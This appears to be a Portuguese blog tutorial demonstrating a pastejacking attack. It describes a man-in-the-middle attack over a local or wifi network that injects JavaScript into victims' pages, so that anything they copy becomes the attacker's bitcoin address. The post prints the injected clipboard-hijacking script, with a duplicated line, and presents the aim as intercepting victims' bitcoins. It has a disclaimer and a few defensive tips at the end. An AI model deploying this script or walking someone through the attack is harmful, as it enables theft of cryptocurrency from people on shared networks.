No vídeo abaixo é demonstrado uma tentativa de ataque direcionado a alterar endereços de bitcoin em uma rede local, mas você pode fazer isso em rede wifi, basta usar sua interface wifi no comando do script.
Atenção: não nos responsabilizamos pelo seus atos ou de nossos leitores, este artigo serve apenas para compartilhar conhecimento.
Certamente vocês se lembram do nosso vídeo ensinando a técnica do pastejacking que consiste em inserir conteúdo malicioso no conteúdo que o usuário pretende copiar.
Com isso em mente, no vídeo abaixo é demonstrado uma tentativa de ataque direcionado a alterar endereços de bitcoin em uma rede local, mas você pode fazer isso em rede wifi, basta usar sua interface wifi no comando do script.
Será necessário ter instalado o mitmf em sua máquina, portanto clique aqui e saiba mais. Foi utilizado uma máquina rodando Kali Linux no vídeo abaixo, confira nossa playlist para mais informações sobre o sistema clicando aqui.
Como pode notar no vídeo, foi utilizado um ataque mitm (man in the middle) passando o tráfego da rede pela nossa máquina para que seja possível injetar um código javascript que permite inserir um texto fixo que será copiado quando o usuário copiar qualquer coisa na página que teve o javascript inserido.
Código javascript utilizado:
document.addEventListener('copy', function(e){
document.addEventListener('copy', function(e){
console.log(e);
e.clipboardData.setData('text/plain', 'BITCOIN-ADDRESS');
e.preventDefault();
});
Se você injetou com sucesso o script e um usuário que está conectado a rede wifi gosta de utilizar bitcoin para realizar pagamentos, existe uma probabilidade alta de você interceptar alguns bitcoins. Para isso, temos que supor que o usuário vá realizar um pagamento com bitcoins - saiba mais sobre criptomoedas clicando aqui.
Suponha que o usuário acessa algum site para comprar um produto e o vendedor aceita bitcoins como pagamento. Este usuário então copia o endereço de bitcoin do vendedor e para realizar o pagamento ele cola o endereço em sua carteira (seja no PC ou celular) para autorizar o envio de bitcoins para o vendedor. Mas infelizmente, o usuário não percebe que na verdade o que foi copiado não foi o endereço de bitcoin do vendedor... mas sim o endereço de bitcoin do hacker, quando ele se der conta que enviou os bitcoins para o endereço errado pode ser que seja muito tarde para reverter a transação, ficando no prejuízo.
O código javascript utilizado é simples, caso tenha interesse em algo mais elaborado clique aqui e confira.
Mas como evitar que casos como este aconteça comigo? Você pode evitar ataques mitm como demonstra o vídeo abaixo:
As versões recentes dos principais navegadores conseguem impedir que o atacante injete o código malicioso em sites que utilizam https, mas ainda é possível burlar essa proteção. Saiba mais clicando aqui. Também é recomendado utilizar extensões que bloqueiam javascript como NoScript.
A dica mais preciosa é conferir o endereço de bitcoin por completo antes de efetuar uma transação!
O conteúdo especificou bitcoins simplesmente por ser a criptomoeda mais utilizada... mas este tipo de ataque pode ser feito usando endereços de outras criptomoedas, caso você sabe que o alvo goste de utilizar alguma moeda em específico.
Fontes: https://github.com/dxa4481/Pastejacking
https://security.love/Pastejacking/
https://www.limontec.com/2018/03/pastejacking-hackeando-ctrlc-ctrlv.html
Mas como evitar que casos como este aconteça comigo? Você pode evitar ataques mitm como demonstra o vídeo abaixo:
COMENTÁRIOS